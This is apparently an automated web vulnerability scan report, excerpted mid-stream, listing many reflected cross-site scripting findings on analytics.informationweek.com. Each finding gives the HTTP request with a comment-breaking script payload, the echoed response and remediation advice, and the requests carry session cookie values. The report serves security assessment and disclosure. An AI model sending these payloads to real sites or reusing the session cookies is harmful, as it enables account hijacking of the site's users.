Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
t%3E3b3d6a8badb%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html">
...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 240a5--><script>alert(1)</script>fd524b9da39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ipt%3Efd524b9da39&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39">
...[SNIP]...
3.26. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ee31f--><script>alert(1)</script>cb09c6d79c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
Ecb09c6d79c0%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 338e7--><script>alert(1)</script>e2d83de194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
p%3A%2F%2Fanalytics.informationweek.com%2Fcss338e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee2d83de194%2FprettyPhoto.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css">
...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6cd90--><script>alert(1)</script>e12e4455fca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
cs.informationweek.com%2Fcss%2FprettyPhoto.css6cd90--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee12e4455fca&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eb92e--><script>alert(1)</script>cf8dc57c4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ce=http%3A%2F%2Fanalytics.informationweek.com%2Fcsseb92e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecf8dc57c4b%2Fstyle.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css">
...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 11fb0--><script>alert(1)</script>769c3628931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/style.css11fb0--><script>alert(1)</script>769c3628931 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2F%2Fanalytics.informationweek.com%2Fcss%2Fstyle.css11fb0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E769c3628931&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/style.css11fb0--><script>alert(1)</script>769c3628931">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 94804--><script>alert(1)</script>7e3b598135e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /gsearch94804--><script>alert(1)</script>7e3b598135e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:43:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
rvice=http%3A%2F%2Fanalytics.informationweek.com%2Fgsearch94804--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e3b598135e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/gsearch94804--><script>alert(1)</script>7e3b598135e">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 73f79--><script>alert(1)</script>30362e0897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index73f79--><script>alert(1)</script>30362e0897/caslogin HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:21:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
http%3A%2F%2Fanalytics.informationweek.com%2Findex73f79--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E30362e0897%2Fcaslogin&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index73f79--><script>alert(1)</script>30362e0897/caslogin">
...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload d2619--><script>alert(1)</script>69a69bed269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/caslogind2619--><script>alert(1)</script>69a69bed269 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:21:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%2Fanalytics.informationweek.com%2Findex%2Fcaslogind2619--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E69a69bed269&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index/caslogind2619--><script>alert(1)</script>69a69bed269">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fcd39--><script>alert(1)</script>3d3330c2607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /joinfcd39--><script>alert(1)</script>3d3330c2607 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
gin?service=http%3A%2F%2Fanalytics.informationweek.com%2Fjoinfcd39--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3d3330c2607&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/joinfcd39--><script>alert(1)</script>3d3330c2607">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fbbbc--><script>alert(1)</script>3cd9c91875d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ce=http%3A%2F%2Fanalytics.informationweek.com%2Fjsfbbbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3cd9c91875d%2Fgetdata.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js">
...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2750a--><script>alert(1)</script>2ac3af659de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/getdata.js2750a--><script>alert(1)</script>2ac3af659de HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2F%2Fanalytics.informationweek.com%2Fjs%2Fgetdata.js2750a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ac3af659de&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/getdata.js2750a--><script>alert(1)</script>2ac3af659de">
...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e0a5--><script>alert(1)</script>6251c524583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... A%2F%2Fanalytics.informationweek.com%2Fjs9e0a5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6251c524583%2Fjquery-1.3.1.min.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload e723d--><script>alert(1)</script>c3717aeb084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ormationweek.com%2Fjs%2Fjquery-1.3.1.min.jse723d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec3717aeb084&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d91ad--><script>alert(1)</script>877e6cf0607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fjsd91ad--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E877e6cf0607%2Fjquery.prettyPhoto.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a7297--><script>alert(1)</script>0f839360ee4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
